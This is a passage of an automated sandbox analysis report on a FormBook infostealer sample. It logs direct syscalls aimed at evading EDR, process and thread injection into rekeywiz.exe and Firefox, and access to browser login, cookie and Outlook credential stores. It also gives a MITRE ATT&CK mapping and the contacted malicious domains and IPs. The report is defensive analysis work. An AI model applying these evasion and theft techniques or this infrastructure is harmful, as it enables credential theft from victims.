                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668D59 mov eax, dword ptr fs:[00000030h]4_2_01668D59
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668D59 mov eax, dword ptr fs:[00000030h]4_2_01668D59
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668D59 mov eax, dword ptr fs:[00000030h]4_2_01668D59
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668D59 mov eax, dword ptr fs:[00000030h]4_2_01668D59
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01734D30 mov eax, dword ptr fs:[00000030h]4_2_01734D30
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168ED25 mov eax, dword ptr fs:[00000030h]4_2_0168ED25
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168ED25 mov eax, dword ptr fs:[00000030h]4_2_0168ED25
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168ED25 mov eax, dword ptr fs:[00000030h]4_2_0168ED25
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E8D20 mov eax, dword ptr fs:[00000030h]4_2_016E8D20
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01718D10 mov eax, dword ptr fs:[00000030h]4_2_01718D10
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01718D10 mov eax, dword ptr fs:[00000030h]4_2_01718D10
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167AD00 mov eax, dword ptr fs:[00000030h]4_2_0167AD00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167AD00 mov eax, dword ptr fs:[00000030h]4_2_0167AD00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167AD00 mov eax, dword ptr fs:[00000030h]4_2_0167AD00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01694D1D mov eax, dword ptr fs:[00000030h]4_2_01694D1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01656D10 mov eax, dword ptr fs:[00000030h]4_2_01656D10
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01656D10 mov eax, dword ptr fs:[00000030h]4_2_01656D10
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01656D10 mov eax, dword ptr fs:[00000030h]4_2_01656D10
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01700DF0 mov eax, dword ptr fs:[00000030h]4_2_01700DF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01700DF0 mov eax, dword ptr fs:[00000030h]4_2_01700DF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166ADE0 mov eax, dword ptr fs:[00000030h]4_2_0166ADE0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166ADE0 mov eax, dword ptr fs:[00000030h]4_2_0166ADE0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtTerminateThread: Direct from: 0x77D32FCCJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtSetInformationThread: Direct from: 0x77D263F9Jump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtQueryInformationToken: Direct from: 0x77D32CACJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtCreateFile: Direct from: 0x77D32FECJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtOpenFile: Direct from: 0x77D32DCCJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtSetInformationProcess: Direct from: 0x77D32C5CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtProtectVirtualMemory: Direct from: 0x77D32F9CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtOpenKeyEx: Direct from: 0x77D32B9CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtResumeThread: Direct from: 0x77D336ACJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtMapViewOfSection: Direct from: 0x77D32D1CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtWriteVirtualMemory: Direct from: 0x77D32E3CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtCreateMutant: Direct from: 0x77D335CCJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtNotifyChangeKey: Direct from: 0x77D33C2CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtQuerySystemInformation: Direct from: 0x77D32DFCJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtReadFile: Direct from: 0x77D32ADCJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtAllocateVirtualMemory: Direct from: 0x77D32BFCJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtCreateUserProcess: Direct from: 0x77D3371CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtQueryInformationProcess: Direct from: 0x77D32C26Jump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtResumeThread: Direct from: 0x77D32FBCJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtDelayExecution: Direct from: 0x77D32DDCJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtQueryAttributesFile: Direct from: 0x77D32E6CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtSetInformationThread: Direct from: 0x77D32B4CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtReadVirtualMemory: Direct from: 0x77D32E8CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtCreateKey: Direct from: 0x77D32C6CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtClose: Direct from: 0x77D32B6C
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtAllocateVirtualMemory: Direct from: 0x77D33C9CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtWriteVirtualMemory: Direct from: 0x77D3490CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtOpenSection: Direct from: 0x77D32E0CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtQueryVolumeInformationFile: Direct from: 0x77D32F2CJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtAllocateVirtualMemory: Direct from: 0x77D348ECJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtAllocateVirtualMemory: Direct from: 0x77D32BECJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtDeviceIoControlFile: Direct from: 0x77D32AECJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeNtQuerySystemInformation: Direct from: 0x77D348CCJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\hh01FRs81x.exeMemory written: C:\Users\user\Desktop\hh01FRs81x.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: NULL target: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: NULL target: C:\Windows\SysWOW64\rekeywiz.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: NULL target: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: NULL target: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\rekeywiz.exeThread register set: target process: 2944Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\rekeywiz.exeThread APC queued: target process: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"Jump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeProcess created: C:\Windows\SysWOW64\rekeywiz.exe "C:\Windows\SysWOW64\rekeywiz.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000000.1237536690.0000000001241000.00000002.00000001.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335660073.0000000001240000.00000002.00000001.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1388892276.0000000001060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000000.1237536690.0000000001241000.00000002.00000001.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335660073.0000000001240000.00000002.00000001.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1388892276.0000000001060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000000.1237536690.0000000001241000.00000002.00000001.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335660073.0000000001240000.00000002.00000001.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1388892276.0000000001060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000000.1237536690.0000000001241000.00000002.00000001.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335660073.0000000001240000.00000002.00000001.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1388892276.0000000001060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\hh01FRs81x.exeQueries volume information: C:\Users\user\Desktop\hh01FRs81x.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation BiasJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.hh01FRs81x.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hh01FRs81x.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1315969342.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1315269021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336185788.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3338322375.0000000004E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336234747.0000000004590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3334175533.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1317262087.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3336041844.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\rekeywiz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\rekeywiz.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.hh01FRs81x.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hh01FRs81x.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1315969342.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1315269021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336185788.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3338322375.0000000004E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336234747.0000000004590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3334175533.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1317262087.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3336041844.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
                Windows Service                		2
                Windows Service                		1
                Masquerading                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		412
                Process Injection                		1
                Disable or Modify Tools                		LSASS Memory121
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		412
                Process Injection                		NTDS41
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials2
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSync112
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634560 Sample: hh01FRs81x.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 33 www.chivor.xyz 2->33 35 www.bitcoinescort.xyz 2->35 37 16 other IPs or domains 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 4 other signatures 2->53 10 hh01FRs81x.exe 11 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 35->51 process4 file5 31 C:\Users\user\AppData\...\hh01FRs81x.exe.log, ASCII 10->31 dropped 67 Injects a PE file into a foreign processes 10->67 14 hh01FRs81x.exe 10->14         started        17 hh01FRs81x.exe 10->17         started        signatures6 process7 signatures8 69 Maps a DLL or memory area into another process 14->69 19 Gm9uUaV91ycxNY3GPL6q.exe 14->19 injected process9 signatures10 55 Found direct / indirect Syscall (likely to bypass EDR) 19->55 22 rekeywiz.exe 13 19->22         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 22->57 59 Tries to harvest and steal browser information (history, passwords, etc) 22->59 61 Modifies the context of a thread in another process (thread injection) 22->61 63 3 other signatures 22->63 25 Gm9uUaV91ycxNY3GPL6q.exe 22->25 injected 29 firefox.exe 22->29         started        process13 dnsIp14 39 www.gariano.info 81.88.63.46, 49718, 49719, 49720 REGISTER-ASIT Italy 25->39 41 trustai.chat 84.32.84.32, 49746, 49747, 49748 NTT-LT-ASLT Lithuania 25->41 43 11 other IPs or domains 25->43 65 Found direct / indirect Syscall (likely to bypass EDR) 25->65 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.